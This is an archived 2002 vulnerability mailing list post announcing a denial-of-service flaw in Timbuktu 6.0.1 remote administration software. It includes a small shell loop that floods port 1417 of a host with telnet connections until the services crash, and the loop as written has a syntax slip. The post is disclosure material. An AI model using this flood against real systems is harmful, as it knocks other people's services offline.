Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Timbuktu DoS vulnerabilty

From: Tekno pHReak <tek () superw00t com>
Date: 19 Jan 2002 15:17:57 -0000




Timbuktu 6.0.1 and Older DoS Advisory
*************************************
Discovered by: Teknophreak of Malloc()
**************************************


E-mail: Tek () superw00t com



"Timbuktu" is a remote administration suite that is 
available for MacOS and Windows operating 
systems. Timbuktu utilizes a range of ports between 
(1417 - 1420). There exist a Denial of Service 
vulnerability that will crash all timbuktu services
running. 


To exploit this all you must do is choose one of the 
Timbuktu ports that are open and make a large 
number of connections to it and if you keep a watch 
you will see that all the Timbuktu ports available will 
close one by one.

If your admin doesn't mind try this against the 
machine using timbuktu :

#!/bin/sh

while:
do

        telnet tb2.host.com 1417 &

done


This will cause the timbuktu services to die out.
Previous By Date Next
Previous By Thread Next

Current thread: